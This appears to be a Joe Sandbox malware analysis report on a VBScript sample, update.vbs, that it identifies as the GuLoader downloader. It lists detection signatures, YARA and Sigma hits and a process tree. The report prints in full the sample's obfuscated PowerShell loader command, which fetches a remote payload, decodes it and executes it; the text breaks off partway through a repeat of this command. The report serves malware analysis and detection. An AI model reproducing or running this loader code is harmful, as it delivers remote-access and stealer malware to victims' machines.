Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
update.vbs

Overview

General Information

Sample name:update.vbs
Analysis ID:1446633
MD5:7bc04c5410cd2c7395ba82859240fea6
SHA1:014f8e77cdedd5141c80a316fc91741efdca8586
SHA256:3a262200a07c9f446ef95a399919a11960671591b90e56312c61b31c2a39dd3a
Tags:vbs
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5008 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1988 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2260 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 2624 cmdline: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene (Concolor 'Gr nd$ Ind,g.dhullVoda.oDespob freda Pte,lHedg,:W.llsPSp bra Reg,g Kab,aU,sidn DeciiHologsY,lloh,ende7Misco3Apo.i=Aya o(B.slac CrakmtvistdCh,rd Cubby/honeyconsla Auric$ C.raUSluednHexaceDesinnMe,dosAnenco Du.auMan.ali,trae Rentd Kuve)Flere ');ratlaasene (Concolor ' Ggep$O tspgGunmal Po toChamob Ts.racan,llParad:OperaJWasteuOmstyb SteriHavgalStrikaNo petDeodoo Ef.erForpoyPaabu= Obse$V.agmBDiploo Op ygmed,tbHazariA,arynToecadEks.ee ,lepr hjskiSuper.CatapsTunenpTe.nglUnbeliSerpet.erip(,mora$ PremPDeuterSkruma Ads,kAk,ierRgskyiOverdt Be.aiPrebr)Svovl ');$Bogbinderi=$Jubilatory[0];ratlaasene (Concolor 'Te ef$UnbesgPartilO ermoAlt rbP.incaPerlul Anti:terneUSa,knnDemi,dO sehe Fermr G nogBegrdr phenuSysken HvepdNine.sEfterhkontorCotypeKlampsjubel=.urerNhexoyeNonpow Feha-OvervOBotchbReseaj ,romeForfecC ouptEfter .ippoSS,ejeyVrdigsOdonttTusineUnambm Arb .TilisNElapie.ensttRusso.varskW.aeone,weakbKnhjeCColorlUnfibi DeraeFllesnFisketNumer ');ratlaasene (Concolor 'M.lle$U,domUOpslanVeer,dMillieH.ster Parag ReporlnpoluAnnulnBogsidGirlesPanteh AkvarKappeeraylisGhane. HabiHluckneArisia RapfdSpanseInfelrT,klosTeleo[Ajlef$Si,tpEUdtogg SpinePerianSensoa bandrCofint ulvseGesantBo.casTagli]Ekste=Vinpl$ for.ZSpgefeProb,mcreamaRepa s Klo, ');$Healthiness=Concolor 'NaaleUOmstdn Osted Mi le NedkrHyp,kgForurr Hondu dvksnTembedMonoksLocalhotte r RefoePr.sts F.sk.R.ptuDRe.mbo C,utwUho,onSymbolVerdeo iegaPolead ChreFovenei.omanlOogoneVendi(Phre.$ DespBBitbloc remgI,degbMode iChi,nn Dir,dHypereReallrPerici Ampu,Situ.$SkotsB Civio.jernu ConfgBermmaFrockiGyritn Su,dv Undei Po tlTaintlRethaeMedioaGlbche TrusrSupernFourpeMecha)Frica ';$Healthiness=$Paganish73[1]+$Healthiness;$Bougainvilleaerne=$Paganish73[0];ratlaasene (Concolor 'I ter$Dy,bug,oogolMyxocoCy.nkbFavoraPurdalGunna:Al.ueSCurvenSjokkuTerm rDesulpMuta eBiltynPrefaoKrimit B nde WindrOverts Daad=Rygdk( TartTLaveeeTingss Spi.t Melt-P.ogrPDeempaAd ptt isfuhPeace untur$CrossBTopiaoStam.u Ad.ig MulmaAudioi RegenBanffvE,nyfiTids lFor elPredueSai.taRefereUrocyrForebnpraese edst) Loss ');while (!$Snurpenoters) {ratlaasene (Concolor 'astig$ Diskg N,nmlhymenoJuri b Hydra SwimlSubso: P,riEDyrtikBecalsoply,aAandsm DeteeRammenEnsilsUforeoUmaa rSrkerd Tu nndan kiSchepn.onorgHj,taeKulturVisuasPrinc= N,bi$AnalstU.smyrKasteuEkphoeKruse ') ;ratlaasene $Healthiness;ratlaasene (Concolor 'Pa laSMa edtVentiaVildsrStyrkt Circ- gyptSFynsklUncateAtel,e Res,pCrev. Dia.4Fj rb ');ratlaasene (Concolor ' ,amm$ HydrgMglinlBrilloPlanebJacobaReocclpen.e: NighSGra,snO aliuTrosbrMinidpPredeeFolkenk,udeoCo,not RelieamtsprH,lias Omb =Kante(CirkuTJhooleBrasqsNyvlgtBonde-allaeP kelta H,det ClimhLegis Trol$ ForbBHeathoBrutuuPavagg elvhaInteriSue fn Bon vDobb iPhyselH.perlConiaeLandfaUnaideMaa erUddatnMantbeServo)Afsva ') ;ratlaasene (Concolor ' onol$Snobbg GanslUnexpoModulbStretaVenchlMeldi:ObeliBOrdinrS,kunuEyrfig lokseNon.orFl veeCobblr Betrf NoreaHennarPortii,aglinDiskegEnsfoe Gr,tr Rhil=Defib$BacksgMundgl outioDam,bbTelefaBrainlSemis:Fy reHHjemloBuni.r Huggtvaishe VolknPre e+Infol+ Rout% Serv$GuiltJTri.euMiljpb Grouip,psilGangbaFjlentUdlbsoPennyrameriyUnr,p.SemihcEneb,odeva.u AdrenPlanetStucc ') ;$Bogbinderi=$Jubilatory[$Brugererfaringer];}$Swimsuit=280753;$Differentialforstrker=28374;ratlaasene (Concolor 'Gamb $Gu sbgbl,dml rugeo P oebGramma To mlBridg: Ov rSDaavitSkildoInforrAdvokmChalkfV.gnmu Fr.olCaterdM,xtueInlea lod=,nter StrikGVurdeeUnsertQ,int-BicreC frilore.elnKipfetSandaePe,rinSto mtRekr, Antig$ ChroB KantoTaphruFo fjg Supea,olysi GharnFllesvIcticiKanonl Bl.sl F rue,osenaPundieHaar.rBagsln P,eaeBrndg ');ratlaasene (Concolor ' ,gri$ NeurgComicl DispoHardfbEnkeraCamoulCelib: CheeSBoudeh ,ensaSolutnBrankt SyssuMundsnC trugLuxur Eueme=Riv,r P,rma[L aveSRev,lySter,sSchiztHj,ste Tambm Enk.. ,pgeCCalyco ppelnStdtevUnsloeBi,anrRac,dt Nive]Semmy:Verts:IndhsFMou,nrUnsooo .rmlmCtrlbBSve,sa IrrisS tteeT,etu6Natte4LakfeSguvactIndrerSaloniHypotnChampgEpony( orge$kopieS ngratProt.o Resur BrndmLirasf Yaplu agrelMi.cldCr,wbeCh ri) Ensp ');ratlaasene (Concolor ' ,ver$Subchg Ja,blBioreoAm.dob Tekia P ell ,ils: pksSWi,dokEringoLop,or,ewrapSkabeeDd,stdFabrieR fugs C ar .mphi= pro. sight[ DesiSPanteyOver,s KoektZanziesvovlmBowdl.Sk.llT slasePo sexUdkobtbarmh.,edbrEStddmn folkcAfsttofiskedBindiiEld,rnOgre gScaff]Ponde:Aftal:G,aehATrochSElek CBerolIW,ittIKldni.QuestG P.yteFarvetBje.gSS miht hilrNonsuiBo.arnHospigFrave(Vir.u$ UbetSR,conhR tteaFr msnScoottAppe.u ryptnrequeg He,a)B,sla ');ratlaasene (Concolor 'Kamph$ ind.gOrganlbib loHip,ib couta Kamflemmer:Hir,nL,angvoDe,pekVestua.ntrulSkonsiPleursAnklaeBrne,r PartiBorn n MontgSemim= .egi$KilopSBaglikLumutoTrosfr P etpPaahnePubisd ResteApplisMarty.Ani.as.xcuruGnar,b Texss se,vt,jaktrOutthiReisan.hegegCe la( arad$StagnSAdornwsun,iiFi,zcm M,sksNevusuForumiSpredt cre,dragl$proteDOceani llesftick.fViatoeTrrehrDampbenebulnBestrtTerciiK lopaAvnerlBrystfb drvo V lurColacsF aeltB aavr Len.kBronkeSpirorSuper)Herre ');ratlaasene $Lokalisering;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 3292 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Acetylmethylcarbinol.Ron && echo $" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • wab.exe (PID: 5964 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2573987215.0000000008B40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000005.00000002.2561974227.0000000005F21000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000005.00000002.2574516885.0000000009DEA000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000002.00000002.2737781412.0000026F3F960000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 1988JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_1988.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_1988.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x10150:$b2: ::FromBase64String(
              • 0xd4df:$s1: -join
              • 0x12fa6:$s3: Reverse
              • 0x6c8b:$s4: +=
              • 0x6d4d:$s4: +=
              • 0xaf74:$s4: +=
              • 0xd091:$s4: +=
              • 0xd37b:$s4: +=
              • 0xd4c1:$s4: +=
              • 0xf70c:$s4: +=
              • 0xf78c:$s4: +=
              • 0xf852:$s4: +=
              • 0xf8d2:$s4: +=
              • 0xfaa8:$s4: +=
              • 0xfb2c:$s4: +=
              • 0xdbf5:$e4: Get-WmiObject
              • 0xdde4:$e4: Get-Process
              • 0xde3c:$e4: Start-Process
              amsi32_2624.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x100a3:$b2: ::FromBase64String(
              • 0xd4df:$s1: -join
              • 0x12ef9:$s3: Reverse
              • 0x6c8b:$s4: +=
              • 0x6d4d:$s4: +=
              • 0xaf74:$s4: +=
              • 0xd091:$s4: +=
              • 0xd37b:$s4: +=
              • 0xd4c1:$s4: +=
              • 0xf70c:$s4: +=
              • 0xf78c:$s4: +=
              • 0xf852:$s4: +=
              • 0xf8d2:$s4: +=
              • 0xfaa8:$s4: +=
              • 0xfb2c:$s4: +=
              • 0xdbf5:$e4: Get-WmiObject
              • 0xdde4:$e4: Get-Process
              • 0xde3c:$e4: Start-Process
              • 0x17970:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", ProcessId: 5008, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.vbs", ProcessId: 5008, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$verdensfjerneconomatic = 1;$Vastities='Su';$Vastities+='bstrin';$Vastities+='g';Function Concolor($Weaselly){$Genoptagelserne=$Weaselly.Length-$verdensfjerneconomatic;For($verdensfjerne=5;$verdensfjerne -lt $Genoptagelserne;$verdensfjerne+=6){$Tetanuses+=$Weaselly.$Vastities.Invoke( $verdensfjerne, $verdensfjerneconomatic);}$Tetanuses;}function ratlaasene($Kontrasts){& ($Protektionerne) ($Kontrasts);}$Zemas=Concolor 'Ka,riMMisaloFor,azRet.si ,ymplexponlD.scoaForts/Rug,k5cirku.Hyp,t0Stimu Runds( annuWSavori CardnReguld reecoHvi.ewAntissPrea so,mNKd,onTProdu non,l1Autoe0Kamer.I.otr0Trans;rejse Inn.WPres.iB,kenn Trkn6Stift4Super; ef e Hi,loxUdst 6Rygel4Quidd;Termo PensrProtevSiali: Semi1 Over2Marsi1Tmrer.Konto0 aria),msae jeerGSolodeKunstcfaberk frakoHypos/ lowp2Tridk0bogca1Vas,e0Damas0 ervi1Finge0Diphe1Stage K mplFMann iSwashr G,ute,udsjfCanceoFrustxsmin /Premi1Bered2Porce1 Xeno.voxe,0Antip ';$Egenartets=Concolor 'BathmU MorgsetuieeMarksrDepic-HaanlASagtmgAthaleSplitnFore,t Ther ';$Bogbinderi=Concolor '.engehpolyttTangltOv rapBridgs Tact:Grund/Optog/Snkniw,rickwAftrywDevot.SregnsP rsoeLnmo,n Sandd .ymmsD flopDysuraDaarlcVandfeImipr.Bottlc Af,eo N mamAntid/ b.skpPokinr .nsooYvonn/Exs.fd ,niflprste/Monop7 ightdVulcahAcantiSkannd .mmu7Spawn ';$Prakriti=Concolor 'Fangs>Neigh ';$Protektionerne=Concolor 'damesiGr.fie homoxM,til ';$Dournesses='Forureningskildens';ratlaasene (Concolor 'NatioSNyt ieSammetpea.a-Bedl,CNont o FrognanskatLivreeAssonn F.lkt Thic D sse-DerriPEdifiaOrgantProvih .jen Per.eTDisse: Tykn\BetonDSk.kkiOverimSti,lyUrban.LakfatFi,kexvr,retBygrn Skave-grassVFejlfaDiplol San u B egeJosfl Bombe$Lab.aDNoncooWooleu GemarUdso.nEnerge Ap.ssFlosssPreh,e KommsApoko; ,top ');ratlaasene (Concolor 'Mout.i DambfLor.e Wiver(AdscitTrocte Foras leoptAl al- LeiopPlastaOverftRetarh Tour BugseTSulai: tran\W,sseDAppleiShab,mTil.sySmnde.UnadutRligsx Ekstt trep)Marke{WhiteeD.bstxPosthioplbetBes,a}.onre;Overs ');$Unensouled = Concolor 'Tu,lieFrknec PalmhBla,koLa el .erde% hantaOraklpGodtepFrancdVarmeamaggitUntemaBedri%Beslu\UnderAMucoscFlskeeRatiot Ungry Kakol DeramOverteBourotpa,eih SognyGrisslTilbycKnl.daMe.virForh bF.riniWal,inForuroMisi.lRdstj. ,urrRUsseloSkndinRende D,mit& Ossa& flam LyskoeVul,scGdninh AcetoEnerg skr.p$Stade ';ratlaasene 